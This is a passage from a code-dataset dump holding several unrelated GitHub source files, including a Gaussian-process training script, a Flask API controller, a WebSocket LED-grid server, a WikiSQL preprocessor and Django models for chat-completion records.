remove_self_loops\r\ndata.edge_index = remove_self_loops(data.edge_index)[0]\r\n\r\ndef get_fixed_splits(data, dataset_name, seed):\r\n with np.load(f'splits/{dataset_name}_split_0.6_0.2_{seed}.npz') as splits_file:\r\n train_mask = splits_file['train_mask']\r\n val_mask = splits_file['val_mask']\r\n test_mask = splits_file['test_mask']\r\n\r\n data.train_mask = torch.tensor(train_mask, dtype=torch.bool)\r\n data.val_mask = torch.tensor(val_mask, dtype=torch.bool)\r\n data.test_mask = torch.tensor(test_mask, dtype=torch.bool)\r\n '''\r\n if dataset_name in {'cora', 'citeseer', 'pubmed'}:\r\n data.train_mask[data.non_valid_samples] = False\r\n data.test_mask[data.non_valid_samples] = False\r\n data.val_mask[data.non_valid_samples] = False\r\n print(\"Non zero masks\", torch.count_nonzero(data.train_mask + data.val_mask + data.test_mask))\r\n print(\"Nodes\", data.x.size(0))\r\n print(\"Non valid\", len(data.non_valid_samples))\r\n else:\r\n assert torch.count_nonzero(data.train_mask + data.val_mask + data.test_mask) == data.x.size(0)\r\n '''\r\n return data\r\n\r\n#data = get_fixed_splits(data, parser.data.lower(), parser.split)\r\n\r\nif parser.base_kernel == 'Polynomial':\r\n base_kernel = gpflow.kernels.Polynomial()\r\nelif parser.base_kernel == 'Matern12':\r\n base_kernel = gpflow.kernels.Matern12()\r\nelif parser.base_kernel == 'Matern32':\r\n base_kernel = gpflow.kernels.Matern32()\r\nelif parser.base_kernel == 'Matern52':\r\n base_kernel = gpflow.kernels.Matern52()\r\nelif parser.base_kernel == 'SquaredExponential':\r\n base_kernel = gpflow.kernels.SquaredExponential()\r\n\r\nfrom kernels import SheafGGP, SheafChebyshev, SheafGGP_t\r\n\r\n#global top_test_acc\r\ntest_accs = []\r\n\r\ndef step_callback(step, variables=None, values=None):\r\n pred = tf.math.argmax(m.predict_f(tf.cast(np.where(data.test_mask)[0].reshape(-1,1), dtype = tf.float64))[0], axis = 1)\r\n correct = np.sum(pred == data.y[data.test_mask])\r\n test_acc = 100.*correct/np.sum(data.test_mask.numpy())\r\n if step % 20 == 0:\r\n pred = tf.math.argmax(m.predict_f(tf.cast(np.where(data.val_mask)[0].reshape(-1,1), dtype = tf.float64))[0], axis = 1)\r\n correct = np.sum(pred == data.y[data.val_mask])\r\n val_acc = 100.*correct/np.sum(data.val_mask.numpy())\r\n print('Epoch = {}, elbo = {:.2f}, val acc = {:.2f}, test acc = {:.2f}'.format(step, m.elbo().numpy(), val_acc, test_acc))\r\n #print_summary(m)\r\n test_accs.append(test_acc)\r\n\r\ndef optimize_tf(model, step_callback, lr=0.01):\r\n opt = tf.optimizers.Adam(lr=lr)\r\n elbos = []\r\n for epoch_idx in range(parser.epoch):\r\n with tf.GradientTape(watch_accessed_variables=False) as tape:\r\n tape.watch(model.trainable_variables)\r\n loss = model.training_loss()\r\n gradients = tape.gradient(loss, model.trainable_variables)\r\n opt.apply_gradients(zip(gradients, model.trainable_variables))\r\n step_callback(epoch_idx)\r\n elbos.append(model.elbo())\r\n #return elbos\r\n \r\nif __name__ == '__main__':\r\n test_accs10 = []\r\n for split in range(0,10):\r\n print('Split', split)\r\n data = get_fixed_splits(data, parser.data.lower(), split)\r\n if parser.train_on_val:\r\n data.train_mask += data.val_mask\r\n split_acc = []\r\n for _ in range(3):\r\n test_accs = []\r\n if parser.approx:\r\n kernel = SheafChebyshev(parser.approx_deg, data.x, data.edge_index, base_kernel)\r\n elif parser.act == 'relu':\r\n kernel = SheafGGP(data, base_kernel=base_kernel)\r\n elif parser.act == 'tanh':\r\n kernel = SheafGGP_t(data, base_kernel=base_kernel)\r\n n_class = data.y.numpy().max()+1\r\n invlink = gpflow.likelihoods.RobustMax(n_class) # Robustmax inverse link function\r\n likelihood = gpflow.likelihoods.MultiClass(n_class, invlink=invlink) # Multiclass likelihood\r\n m = gpflow.models.VGP(\r\n (tf.cast(np.where(data.train_mask)[0].reshape(-1,1), dtype = tf.float64), tf.reshape(data.y[data.train_mask], (-1,1))),\r\n likelihood=likelihood, \r\n kernel=kernel, \r\n num_latent_gps=n_class\r\n )\r\n #print_summary(m)\r\n optimize_tf(m, step_callback, lr = parser.lr)\r\n split_acc.append(max(test_accs))\r\n\r\n test_accs10.append(max(split_acc))\r\n print('split = {}, acc = {}'.format(split, max(split_acc)))\r\n print(test_accs10)\r\n print('Mean:', np.mean(test_accs10), 'sd', np.std(test_accs10))","repo_name":"yincong-zhi/Sheaf-Laplacian-GP","sub_path":"sheaf_gp_nsd.py","file_name":"sheaf_gp_nsd.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"25324093705","text":"from flask import Blueprint, request\nfrom model.user import User\nfrom service.user_service import UserService\nfrom exception.invalid_parameter import InvalidParameterError\n\nuc = Blueprint('user_controller', __name__)\nuser_service = UserService()\n\n\n@uc.route('/users')\ndef get_all_users():\n return {\n \"users\": user_service.get_all_users() # a list of dictionaries\n }\n\n\n@uc.route('/users/')\ndef get_user_by_username(username):\n try:\n return user_service.get_user_by_username(username) # dictionary\n except KeyError as e:\n return {\n \"message\": f\"User with username {username} was not found!\"\n }, 404\n\n\n@uc.route('/users', methods=['POST'])\ndef add_user():\n user_json_dictionary = request.get_json()\n user_object = User(user_json_dictionary['username'], user_json_dictionary['mobile_phone'])\n try:\n return user_service.add_user(user_object), 201 # Dictionary representation of the newly added user\n # 201 created\n except InvalidParameterError as e:\n return {\n \"message\": str(e)\n }, 400\n\n\n@uc.route('/users/', methods=['PUT'])\ndef edit_user_by_username(username):\n user_json_dictionary = request.get_json()\n user_object = User(user_json_dictionary['username'], user_json_dictionary['mobile_phone'])\n return user_service.edit_user_by_username(username, user_object)\n","repo_name":"220613-pwa-ext/training","sub_path":"week-2/day-4/todo-management-app/controller/user_controller.py","file_name":"user_controller.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"33339416765","text":"from math import sin, cos, sqrt, atan2, radians\r\n\r\n\r\ndef distance(lat1, lon1, lat2, lon2):\r\n R = 6373.0\r\n\r\n lat1 = radians(lat1)\r\n lon1 = radians(lon1)\r\n lat2 = radians(lat2)\r\n lon2 = radians(lon2)\r\n\r\n dlon = lon2 - lon1\r\n dlat = lat2 - lat1\r\n\r\n arc = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\r\n dips = atan2(sqrt(arc), sqrt(1 - arc))\r\n dips *= 2\r\n\r\n return dips * R\r\n\r\ndef format_dist(km):\r\n if km < 1:\r\n return '{0} m'.format(int(km * 100))\r\n\r\n if km < 10:\r\n km = \"%.2f\".format(km)\r\n return '{0} km'.format(km.replace(\".\", \",\"))\r\n\r\n return '{0} km'.format(int(km))","repo_name":"aureliancnx/easink","sub_path":"easink/utils/math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21051230371","text":"# -*- coding: utf-8 -*-\nimport time\nfrom pinpong.board import Board,Pin\n\nip = \"192.168.1.116\"\nport = 8081\n\nBoard(ip, port)\n\nbtn = Pin(Pin.D8, Pin.IN)\n\ndef btn_rasing_handler(pin):#中断事件回调函数\n print(\"\\n--rising---\")\n print(\"pin = \", pin)\n \ndef btn_falling_handler(pin):#中断事件回调函数\n print(\"\\n--falling---\")\n print(\"pin = \", pin)\n\ndef btn_both_handler(pin):#中断事件回调函数\n print(\"\\n--both---\")\n print(\"pin = \", pin)\n\nbtn.irq(trigger=Pin.IRQ_FALLING, handler=btn_falling_handler) #设置中断模式为下降沿触发\n#btn.irq(trigger=Pin.IRQ_RISING, handler=btn_rasing_handler) #设置中断模式为上升沿触发,及回调函数\n#btn.irq(trigger=Pin.IRQ_RISING+Pin.IRQ_FALLING, handler=btn_both_handler) #设置中断模式为电平变化时触发\n\nwhile True:\n time.sleep(1)\n","repo_name":"milkv-duo/duo-buildroot-sdk","sub_path":"buildroot-2021.05/package/python-pinpong/pinpong/examples/PinPong Board/example/tcp_example/1-05-irq.py","file_name":"1-05-irq.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"27"} +{"seq_id":"28767947294","text":"T = int(input())\r\nfor _ in range(T):\r\n VPS = input()\r\n cnt = 0\r\n for i in VPS:\r\n if i == '(':\r\n cnt +=1\r\n elif i ==')':\r\n cnt -=1\r\n if cnt < 0:\r\n break\r\n if cnt == 0:\r\n print('YES')\r\n else:\r\n print('NO')\r\n","repo_name":"inho3213/ALGORITHM","sub_path":"백준/Silver/9012. 괄호/괄호.py","file_name":"괄호.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26223866429","text":"import numpy as np\nimport src.utils.utils as utils\nimport scipy.sparse as ssp\n\nimport moz_sp.sql_tokenizer as sql_tokenizer\nfrom src.data_processor.processor_utils import get_table_aware_transformer_encoder_inputs\nfrom src.data_processor.processor_utils import get_transformer_output_value_mask\nfrom src.data_processor.processor_utils import Text2SQLExample\nfrom src.data_processor.processor_utils import START_TOKEN, EOS_TOKEN, NUM_TOKEN, STR_TOKEN\nfrom src.data_processor.vocab_utils import functional_tokens\nimport src.data_processor.tokenizers as tok\nimport src.data_processor.vectorizers as vec\nfrom src.utils.utils import BRIDGE, is_number\n\nRESERVED_TOKEN_TYPE = sql_tokenizer.RESERVED_TOKEN\n\n\ndef preprocess_example(split, example, args, parsed_programs, text_tokenize, program_tokenize, post_process,\n table_utils, schema_graph, vocabs, verbose=False):\n tu = table_utils\n text_vocab = vocabs['text']\n program_vocab = vocabs['program']\n\n def get_memory_values(features, raw_text, args):\n if args.pretrained_transformer.startswith('bert-') and args.pretrained_transformer.endswith('-uncased'):\n return utils.restore_feature_case(features, raw_text, tu)\n else:\n return features\n\n def get_text_schema_adjacency_matrix(text_features, s_M):\n schema_size = s_M.shape[0]\n text_size = len(text_features)\n full_size = schema_size + text_size\n M = ssp.lil_matrix((full_size, full_size), dtype=np.int)\n M[-schema_size:, -schema_size:] = s_M\n return M\n\n # sanity check\n ############################\n query_oov = False\n denormalized = False\n schema_truncated = False\n token_restored = True\n ############################\n\n # Text feature extraction and set program ground truth list\n if isinstance(example, Text2SQLExample):\n if args.pretrained_transformer:\n text_features = text_tokenize(example.text)\n text_tokens, token_starts, token_ends = get_memory_values(text_features, example.text, args)\n if not token_starts:\n token_restored = False\n else:\n text_tokens = text_tokenize(example.text, functional_tokens)\n text_features = [t.lower() for t in text_tokens]\n example.text_tokens = text_features\n example.text_ptr_values = text_tokens\n example.text_token_starts = token_starts\n example.text_token_ends = token_ends\n example.text_ids = vec.vectorize(text_features, text_vocab)\n example.text_ptr_input_ids = vec.vectorize(text_features, text_vocab)\n program_list = example.program_list\n example.values = [(schema_graph.get_field(cond[0]).signature, cond[2])\n for cond in example.program_ast_list_[0]['conds']\n if (isinstance(cond[2], str) and not is_number(cond[2]))]\n else:\n text_tokens = example.example.text_ptr_values\n text_features = example.example.text_tokens\n program_list = example.example.program_list\n\n # Schema feature extraction\n if args.model_id in [BRIDGE]:\n question_encoding = example.text if args.use_picklist else None\n tables = sorted([schema_graph.get_table_id(t_name) for t_name in example.gt_table_names]) \\\n if args.use_oracle_tables else None\n table_po, field_po = schema_graph.get_schema_perceived_order(tables)\n schema_features, matched_values = schema_graph.get_serialization(\n tu, flatten_features=True, table_po=table_po, field_po=field_po,\n use_typed_field_markers=args.use_typed_field_markers, use_graph_encoding=args.use_graph_encoding,\n question_encoding=question_encoding, top_k_matches=args.top_k_picklist_matches,\n num_values_per_field=args.num_values_per_field, no_anchor_text=args.no_anchor_text)\n example.matched_values = matched_values\n example.input_tokens, example.input_ptr_values, num_excluded_tables, num_excluded_fields = \\\n get_table_aware_transformer_encoder_inputs(text_tokens, text_features, schema_features, table_utils)\n schema_truncated = (num_excluded_fields > 0)\n num_included_nodes = schema_graph.get_num_perceived_nodes(table_po) + 1 - num_excluded_tables - num_excluded_fields\n example.ptr_input_ids = vec.vectorize(example.input_tokens, text_vocab)\n if args.read_picklist:\n example.transformer_output_value_mask, value_features, value_tokens = \\\n get_transformer_output_value_mask(example.input_tokens, matched_values, tu)\n example.primary_key_ids = schema_graph.get_primary_key_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.foreign_key_ids = schema_graph.get_foreign_key_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.field_type_ids = schema_graph.get_field_type_ids(num_included_nodes, table_po=table_po, field_po=field_po)\n example.table_masks = schema_graph.get_table_masks(num_included_nodes, table_po=table_po, field_po=field_po)\n example.field_table_pos = schema_graph.get_field_table_pos(num_included_nodes, table_po=table_po, field_po=field_po)\n example.schema_M = schema_graph.adj_matrix\n example.M = get_text_schema_adjacency_matrix(text_features, example.schema_M)\n else:\n num_included_nodes = schema_graph.num_nodes\n\n # Value copy feature extraction\n if args.read_picklist:\n constant_memory_features = text_features + value_features\n constant_memory = text_tokens + value_tokens\n example.text_ptr_values = constant_memory\n else:\n constant_memory_features = text_features\n constant_ptr_value_ids, constant_unique_input_ids = vec.vectorize_ptr_in(constant_memory_features, program_vocab)\n if isinstance(example, Text2SQLExample):\n example.text_ptr_value_ids = constant_ptr_value_ids\n example.ptr_value_ids = constant_ptr_value_ids + [program_vocab.size + len(constant_memory_features) + x\n for x in range(num_included_nodes)]\n\n if not args.leaderboard_submission:\n for j, program in enumerate(program_list):\n if isinstance(example, Text2SQLExample):\n # Model II. Bridge output\n program_singleton_field_tokens, program_singleton_field_token_types = \\\n tok.wikisql_struct_to_tokens(example.program_ast_, schema_graph, tu)\n program_singleton_field_tokens = [START_TOKEN] + program_singleton_field_tokens + [EOS_TOKEN]\n program_singleton_field_token_types = \\\n [RESERVED_TOKEN_TYPE] + program_singleton_field_token_types + [RESERVED_TOKEN_TYPE]\n example.program_singleton_field_tokens_list.append(program_singleton_field_tokens)\n example.program_singleton_field_token_types_list.append(program_singleton_field_token_types)\n program_singleton_field_input_ids = vec.vectorize_singleton(\n program_singleton_field_tokens, program_singleton_field_token_types, program_vocab)\n example.program_singleton_field_input_ids_list.append(program_singleton_field_input_ids)\n else:\n # Model II. Bridge output\n example.program_singleton_field_input_ids_list.append(\n example.example.program_singleton_field_input_ids_list[j])\n program_singleton_field_tokens = example.example.program_singleton_field_tokens_list[j]\n program_singleton_field_token_types = example.example.program_singleton_field_token_types_list[j]\n\n program_field_ptr_value_ids = vec.vectorize_field_ptr_out(program_singleton_field_tokens,\n program_singleton_field_token_types,\n program_vocab,\n constant_unique_input_ids,\n max_memory_size=len(constant_memory_features),\n schema=schema_graph,\n num_included_nodes=num_included_nodes)\n example.program_text_and_field_ptr_value_ids_list.append(program_field_ptr_value_ids)\n\n table_ids = [schema_graph.get_table_id(table_name) for table_name in example.gt_table_names_list[j]]\n example.table_ids_list.append(table_ids)\n assert ([schema_graph.get_table(x).name for x in table_ids] == example.gt_table_names)\n\n # sanity check\n ############################\n # NL+Schema pointer output contains tokens that does not belong to any of the following categories\n if verbose:\n if program_vocab.unk_id in program_field_ptr_value_ids:\n unk_indices = [i for i, x in enumerate(program_field_ptr_value_ids) if x == program_vocab.unk_id]\n print('OOV II: {}'.format(' '.join([program_singleton_field_tokens[i] for i in unk_indices])))\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n query_oov = True\n if program_vocab.unk_field_id in program_field_ptr_value_ids:\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n if program_vocab.unk_table_id in program_field_ptr_value_ids:\n example.pretty_print(schema=schema_graph,\n de_vectorize_ptr=vec.de_vectorize_ptr,\n de_vectorize_field_ptr=vec.de_vectorize_field_ptr,\n rev_vocab=program_vocab,\n post_process=post_process,\n use_table_aware_te=(args.model_id in [BRIDGE]))\n ############################\n\n # Store the ground truth queries after preprocessing to run a relaxed evaluation or\n # to evaluate with partial queries\n if split == 'dev':\n input_tokens = text_tokens\n if args.model_id in [BRIDGE]:\n _p = vec.de_vectorize_field_ptr(program_field_ptr_value_ids, program_vocab, input_tokens,\n schema=schema_graph, post_process=post_process)\n else:\n _p = program\n example.gt_program_list.append(_p)\n\n # sanity check\n ############################\n # try:\n # assert(equal_ignoring_trivial_diffs(_p, program.lower(), verbose=True))\n # except Exception:\n # print('_p:\\t\\t{}'.format(_p))\n # print('program:\\t{}'.format(program))\n # print()\n # import pdb\n # pdb.set_trace()\n ############################\n\n example.run_unit_tests()\n\n return query_oov, denormalized, schema_truncated, token_restored\n","repo_name":"salesforce/TabularSemanticParsing","sub_path":"src/data_processor/processors/data_processor_wikisql.py","file_name":"data_processor_wikisql.py","file_ext":"py","file_size_in_byte":11946,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"27"} +{"seq_id":"7789334191","text":"#!/usr/local/bin/python3.4\n# -*- coding: utf-8 -*-\n\n# Read the README.md for a basic understanding of the server API.\n\n# import python libs\nimport json\nimport asyncio\nimport socket\nfrom autobahn.asyncio.websocket import WebSocketServerProtocol\nfrom autobahn.asyncio.websocket import WebSocketServerFactory\n\n# import project libs\nimport config\nfrom issetHelper import IssetHelper\nfrom colorController import ColorController\n\n\n\n# This is a autobahn based web socket protocol for the AmbiGrid API.\n# Read the README.md file to get an understanding of the API\nclass WebSocketProtocol(WebSocketServerProtocol, IssetHelper):\n\n def onOpen(self):\n if self.beVerbose: print('WebSocket connection open.')\n\n def onConnect(self, request):\n if self.beVerbose: print('\\nClient connecting: {}'.format(request.peer))\n self.animationController.setWebSocketHandler(self)\n\n def onClose(self, wasClean, code, reason):\n if self.beVerbose: print('\\nWebSocket connection closed: {}'.format(reason))\n self.animationController.unsetWebSocketHandler(self)\n\n def onMessage(self, payload, isBinary):\n if isBinary:\n return\n\n stringMessage = payload.decode('utf8')\n response = {}\n\n try:\n jsonMessage = json.loads(stringMessage)\n response = self.processRequest(jsonMessage)\n except ValueError:\n response = self.statusRequest()\n\n self.sendDictionary(response)\n\n def sendDictionary(self, dictionary):\n responsAsJsonString = json.dumps(dictionary, ensure_ascii=False)\n self.sendMessage(responsAsJsonString.encode('utf8'))\n\n def setReferences(self, bridge, animationController, verbose):\n self.bridge = bridge\n self.animationController = animationController\n self.colors = ColorController\n self.beVerbose = verbose\n\n def processRequest(self, requestData):\n response = {}\n\n if requestData['action'] == 'setAnimation':\n self.setAnimationRequest(requestData)\n elif requestData['action'] == 'setFadeOut':\n self.setFadeOutRequest(requestData)\n elif requestData['action'] == 'stopFadeOut':\n self.stopFadeOutRequest()\n elif requestData['action'] == 'setBaseColor':\n self.setColorRequest(requestData)\n\n response = self.statusRequest(requestData)\n\n return response\n\n def statusRequest(self, requestData = None):\n if (self.isset(requestData, 'details') and\n requestData['details'] == True):\n return self.animationController.getAllStati()\n else:\n return self.animationController.getStatus()\n\n def setAnimationRequest(self, requestData):\n if self.isset(requestData, 'name'):\n self.animationController.showAnimation(requestData)\n\n def setFadeOutRequest(self, requestData):\n time = self.saveIntConvert(requestData['seconds'])\n if time > 0:\n self.animationController.setFadeOut(time)\n\n def stopFadeOutRequest(self):\n self.animationController.stopFadeOut()\n\n def setColorRequest(self, requestData):\n colorType = requestData['type']\n\n if colorType == 'hex' and self.isInt(requestData['value'], 16):\n return self.colors.setBasisColorAsHex(int(requestData['value'], 16))\n\n elif colorType == 'rgb':\n return self.setRgbColorRequest(requestData)\n\n elif colorType == 'hsl':\n return self.setHslColorRequest(requestData)\n\n def setRgbColorRequest(self, requestData):\n try:\n redValue = int(requestData['red'])\n greenValue = int(requestData['green'])\n blueValue = int(requestData['blue'])\n except (ValueError, TypeError):\n return\n\n if (redValue >= 0 and redValue <= 255 and\n greenValue >= 0 and greenValue <= 255 and\n blueValue >= 0 and blueValue <= 255):\n self.colors.setBasisColorAsRgb(redValue, greenValue, blueValue)\n\n def setHslColorRequest(self, requestData):\n try:\n hue = float(requestData['hue'])\n saturation = float(requestData['saturation'])\n lightness = float(requestData['lightness'])\n except (ValueError, TypeError):\n return\n\n if (hue >= 0 and hue <= 1 and\n saturation >= 0 and saturation <= 1 and\n lightness >= 0 and lightness <= 1):\n self.colors.setBasisColorAsHsl(hue, saturation, lightness)\n\n\n\nclass AmbiGridNetworking():\n\n def __init__(self, wsPort, lightAnimationController, verbose = False):\n # initializations\n self.port = wsPort\n self.animationController = lightAnimationController\n self.beVerbose = verbose\n\n # prepare the web socket protocol\n webSocketProtocol = WebSocketProtocol\n webSocketProtocol.setReferences(\n webSocketProtocol, self, self.animationController, self.beVerbose)\n\n # prepare the web sockets\n factory = WebSocketServerFactory()\n factory.protocol = webSocketProtocol\n\n # get the host's IP\n if config.AUTO_DETECT_HOST_IP:\n host = socket.gethostbyname(socket.gethostname())\n else:\n host = config.HOST_IP\n\n # start the server event loop\n loop = asyncio.get_event_loop()\n coro = loop.create_server(factory, host, self.port)\n wsServer = loop.run_until_complete(coro)\n\n try:\n if self.beVerbose:\n serverAddressString = host + ':' + str(self.port)\n print('WS sever: launched at', serverAddressString)\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n finally:\n wsServer.close()\n loop.close()\n","repo_name":"RGreinacher/AmbiGrid","sub_path":"system/networkInterface.py","file_name":"networkInterface.py","file_ext":"py","file_size_in_byte":5800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"10020016505","text":"import pygame\r\n\r\n\r\nclass Wall:\r\n\r\n def __init__(self, CellSim, x, y, width, height):\r\n self.CellSim = CellSim\r\n self.settings = CellSim.settings\r\n self.screen = CellSim.screen\r\n self.pos = x + y * self.settings.gridCollumns\r\n self.width = width\r\n self.height = height\r\n self.grid = CellSim.grid\r\n self.rects = []\r\n self.make()\r\n \r\n \r\n\r\n def make(self):\r\n pos = self.pos\r\n for y in range(0, self.height):\r\n for x in range(0, self.width):\r\n rect = pygame.Rect(0, 0, self.grid.intervalCol, self.grid.intervalRow)\r\n point = self.grid.points[pos]\r\n rect.center = point.x, point.y\r\n self.rects.append(rect)\r\n pos += 1\r\n pos += self.settings.gridCollumns - 1\r\n\r\n def run(self):\r\n color = 0, 0, 0\r\n for rect in self.rects:\r\n pygame.draw.rect(self.screen, color, rect)","repo_name":"BertHert/CellSim","sub_path":"Walls.py","file_name":"Walls.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11691270462","text":"python_lugati = {\n 'int' : 'butun son toifasi',\n 'float' : '10 li son toifasi',\n 'string' : 'matn toifasi',\n 'if' : 'agar',\n 'elif' : 'aksincha agar',\n 'else' : 'aksincha',\n 'insert' : 'kiritish',\n 'append' : 'qo\\'shib qo\\'yish',\n 'del' : 'o\\'chirish',\n 'print' : 'chiqarish'\n}\n\nkalit = input(\"\\nKalit so'z kiriting! >>> \").lower()\ntarjima = python_lugati.get(kalit)\n\n# print(python_lugati.get(kalit, \"Bunday so'z mavjud emas\"))\n\nif kalit == None:\n print(\"Bunday so'z mavjud emas\")\nelse :\n print(f\"{kalit.title()} so'zi {tarjima} deb tarjima qilinadi\")","repo_name":"Azamat2400/python_darslari","sub_path":"14-dars_lug'at/python_lug'ati.py","file_name":"python_lug'ati.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"31402412430","text":"# Model\n\nimport random\n\nclass Polje:\n def __init__(self, vrstice, stolpci, stevilo_min):\n self.vrstice = vrstice\n self.stolpci = stolpci\n self.stevilo_min = stevilo_min\n \n def __repr__(self):\n vrstice, stolpci, stevilo_min = self.podatki()\n return ('{}(vrstice={}, stolpci={}, stevilo min={})'.format(self.__class__.__name__,\n vrstice, stolpci, stevilo_min))\n\n def podatki(self):\n return self.vrstice, self.stolpci, self.stevilo_min\n\n def matrika(self):\n matrika = [[0 for j in range(self.stolpci)] for i in range(self.vrstice)]\n return matrika\n\n def postavi_mine(self):\n stevilo_min = self.stevilo_min\n matrika_z_minami = self.matrika()\n if stevilo_min > self.vrstice * self.stolpci:\n return None # ko kličeš preveri, da ni NONE\n else:\n while stevilo_min > 0:\n nakljucna_vrstica = random.randint(0, self.vrstice - 1)\n nakljucen_stolpec = random.randint(0, self.stolpci - 1)\n if matrika_z_minami[nakljucna_vrstica][nakljucen_stolpec] == 0:\n matrika_z_minami[nakljucna_vrstica][nakljucen_stolpec] = 1\n stevilo_min -= 1\n return matrika_z_minami\n\n def sosede(self, i, j, matrika):\n sosede = 0\n for vrstica in range(i-1, i+2):\n for stolpec in range(j-1, j+2):\n if (vrstica == i) and (stolpec == j): # sama sebi ni sosed\n continue\n if ((vrstica < 0) or (vrstica > self.vrstice-1) or (stolpec < 0) or (stolpec > self.stolpci-1)):\n # smo izven matrike\n continue\n if matrika[vrstica][stolpec] == 1: # mina\n sosede += 1 \n return sosede\n \n \n\n","repo_name":"enejkovac/Minolovec","sub_path":"Minolovec_model.py","file_name":"Minolovec_model.py","file_ext":"py","file_size_in_byte":1902,"program_lang":"python","lang":"sl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6576905460","text":"import os\nimport simplejson as json\nimport pandas as pd\n\ndef save(Search_KeyWord, project_name, project_name_link, Image_Link, Image_Link_Name, Project_Location, Project_Location_Redirect_Line\n , price_range, Built_Up_Area, EMI, RERA, Marketed_by, Owner_name,\n Owner_link, Owner_type, Description, NearBy_Facility):\n print(\"In a file \"+ Search_KeyWord)\n count, n_count = 0, 0\n n1 = []\n #NearBy to JSON\n for i in NearBy_Facility:\n n_count = n_count + 1\n n1.append({\"N_Id\": n_count, \"Name\": i})\n #print(n1[0])\n\n if os.path.isfile(\"./Housing_json/housing_\" + Search_KeyWord + \".json\") and os.stat(\"./Housing_json/housing.json\").st_size != 0:\n print(\"Exists\")\n #old_file = open(\"./housing_\" + Search_KeyWord + \".json\", \"r+\")\n #d = json.loads(old_file.read())\n else:\n count = 0\n d = []\n old_file = open(\"./Housing_json/housing_\" + Search_KeyWord + \".json\", \"w+\")\n print(\"Opening the File\")\n print(\"Converting to JSON\")\n for i in range(len(project_name)):\n count = count + 1\n print(\"Appending the \" + str(i) + \" value\")\n d.append({\"Id\": count,\n \"Project_Name\": project_name[i],\n \"Project_Name_Link\": project_name_link[i],\n \"Image_Link\" : Image_Link[i],\n \"Image_Link_Name\": Image_Link_Name[i],\n \"Project_Location\": Project_Location[i],\n \"Project_Location_Redirect_Line\": Project_Location_Redirect_Line[i],\n \"Price_Range\": price_range[i],\n \"Built_Up_Area\": Built_Up_Area[i],\n \"EMI\": EMI[i],\n \"Rera\": RERA[i],\n \"Marketed_by\": Marketed_by[i],\n \"Owner_name\": Owner_name[i],\n \"Owner_link\": Owner_link[i],\n \"Owner_type\": Owner_type[i],\n \"Description\": Description[i],\n \"NearBy_Facility\": n1[i]})\n\n print(\"Writing to File\")\n old_file.seek(0)\n old_file.write(json.dumps(d))\n print(\"Sucessfully Completed\")\n print(\"Writing to CSV File\")\n df = pd.DataFrame(d)\n df.to_csv(\"./Housing_csv/housing_\" + Search_KeyWord + \".csv\", index=False)\n\n\n","repo_name":"Avilashj34/Web-Scraping","sub_path":"Web Scraping/SaveToFile.py","file_name":"SaveToFile.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"34067774614","text":"from django.db import models\n\nfrom . import enums\n\n\nclass FunctionCall(models.Model):\n \"\"\"Function call\"\"\"\n\n arguments = models.TextField()\n name = models.TextField()\n\n\nclass Message(models.Model):\n \"\"\"Message for conversation\"\"\"\n\n content = models.TextField()\n name = models.TextField(null=True, blank=True)\n function_call = models.OneToOneField(\n FunctionCall, on_delete=models.CASCADE, null=True, blank=True\n )\n role = models.CharField(choices=enums.Role.choices())\n\n\nclass Choice(models.Model):\n \"\"\"Message choice by OpenAI API\"\"\"\n\n chatcmpl = models.ForeignKey(\"Chatcmpl\", on_delete=models.CASCADE)\n finish_reason = models.CharField(choices=enums.FinishReason.choices())\n index = models.PositiveIntegerField()\n message = models.OneToOneField(Message, on_delete=models.CASCADE)\n\n\nclass Usage(models.Model):\n \"\"\"Usage by OpenAI API\"\"\"\n\n completion_tokens = models.PositiveIntegerField()\n prompt_tokens = models.PositiveIntegerField()\n total_tokens = models.PositiveIntegerField()\n\n\nclass Chatcmpl(models.Model):\n \"\"\"Chat completion by OpenAI API\"\"\"\n\n id = models.CharField(primary_key=True)\n created = models.PositiveIntegerField()\n model = models.CharField()\n object = models.CharField()\n usage = models.OneToOneField(Usage, on_delete=models.CASCADE)\n\n\nclass ChatcmplRequest(models.Model):\n \"\"\"Chat completion request for OpenAI API\"\"\"\n\n request = models.JSONField()\n response = models.OneToOneField(Chatcmpl, on_delete=models.CASCADE)\n component = models.ForeignKey(\"core.Component\", on_delete=models.CASCADE)\n","repo_name":"LioQing/chat-composer","sub_path":"oai/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"22246063898","text":"import tensorflow as 